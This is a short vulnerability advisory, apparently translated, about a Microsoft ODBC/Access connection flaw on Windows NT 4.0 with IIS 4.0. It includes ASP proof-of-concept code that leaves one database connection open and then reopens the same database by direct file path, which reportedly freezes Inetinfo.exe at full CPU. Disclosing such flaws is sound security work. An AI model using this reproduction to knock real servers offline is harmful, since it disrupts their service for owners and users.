Resolves 18, MS ODBC database connection overflow causes nt/9x denial of service attack
Vulnerability Description:
A Microsoft ODBC database may have potential overflow problems when connecting and disconnecting (Microsoft Access database related).
Connecting directly to the second database without canceling the connection may cause the service to stop.
Impact System:
ODBC version: 3.510.3711.0
ODBC Access Driver version: 3.51.1029.00
OS version: Windows NT 4.0 Service Pack 5, IIS 4.0 (i386)
Microsoft Office Professional (mso97.dll:8.0.0.3507)
The vulnerability detection method is as follows:
ODBC Connection Source Name: miscdb
ODBC Database model: MS Access
ODBC assumption Path: d:\data\misc.mdb
The ASP code is as follows:
<%
Set connvb = Server.CreateObject ("ADODB. Connection ")
Connvb.open "Driver={microsoft Access DRIVER (*.mdb)}; DSN=MISCDB "
%>
<body>
... lots of HTML removed ...
<!--We Connect to DB1-->
<%
Set Connglobal = Server.CreateObject ("ADODB. Connection ")
Connglobal.open "DSN=MISCDB; User=sa "
mSQL = "Arb SQL Statement"
Set Rsglobal = Connglobal.execute (mSQL)
While not rsglobal.eof
Response.Write Rsglobal ("resultfrommiscdb")
Rsglobal.movenext
Wend
' Rsglobal.close
' Set Rsglobal = Nothing
' Connglobal.close
' Set Connglobal = Nothing
' We don't close the connection
%>
<!--call the same database by means of DBQ direct file access-->
<%
Set Connglobal = Server.CreateObject ("ADODB. Connection ")
Connglobal.open "Driver={microsoft Access DRIVER (*.mdb)};
Dbq=d:\data\misc.mdb "
mSQL = "Arb SQL Statement"
Set Rsglobal = Connglobal.execute (mSQL)
While not rsglobal.eof
Response.Write Rsglobal ("resultfrommiscdb")
Rsglobal.movenext
Wend
Rsglobal.close
Set Rsglobal = Nothing
Connglobal.close
Set Connglobal = Nothing
' We do close the connection
%>
In this case, the IIS processing process will pause and CPU usage will reach 100% due to the Inetinfo.exe process. You must restart your computer to recover.
